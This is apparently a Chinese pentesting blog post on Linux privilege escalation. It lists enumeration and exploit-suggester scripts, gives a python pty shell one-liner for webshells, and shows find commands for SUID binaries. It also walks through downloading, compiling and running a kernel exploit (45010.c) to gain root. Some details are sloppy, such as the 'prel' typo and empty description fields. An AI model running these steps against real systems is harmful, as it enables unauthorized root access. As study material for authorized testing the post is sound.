一、Linux信息收集:

  1. LinEnum脚本
  2. 地址:https://github.com/rebootuser/LinEnum
  3. 介绍:
  4. 用法:
    上传到 /tmp目录下,然后运行即可
    在这里插入图片描述

二、Linux漏洞探测:
5. Linux-exploit-suggester脚本
6. 地址:https://github.com/mzet-/linux-exploit-suggester
7. 介绍:
8. 用法:
上传到 /tmp目录下,然后运行即可

三、Linux漏洞探测:
9. Linux-exploit-suggester-2.pl脚本
10. 地址:https://github.com/jondonas/linux-exploit-suggester-2
11. 介绍:
12. 用法:
上传到 /tmp目录下,然后使用perl运行即可(需要安装perl命令)

prel  Linux-exploit-suggester-2.pl

四、Linux提权方式:

**注意1:**凡是需要编译的,均无法在webshell内执行,如gcc、make等
在这里插入图片描述
注意2:
python调用本地shell实现交互式命令行

python -c 'import pty;pty.spawn('/bin/bash')'

SUID提权:

  1. 参考:https://pentestlab.blog/2017/09/25/suid-executables/
  2. 关键:查找SUID中是否含有以下支持命令:
 Nmap、Vim、find、Bash、More、Less、Nano、cp
  1. 手工判断:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

在这里插入图片描述
内核漏洞提权

  1. CVE-2017-16695
  2. 下载C代码:
wget https://github.com/Jewel591/Privilege-Escalation/blob/master/45010.c
  1. 使用步骤:

#下面进行编译
gcc 45010.c -o 45010
#添加执行权限
chmod +x 45010
./45010
#成功提权到 root。
whoami
root
在这里插入图片描述

脏牛漏洞提权

Logo

开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!

更多推荐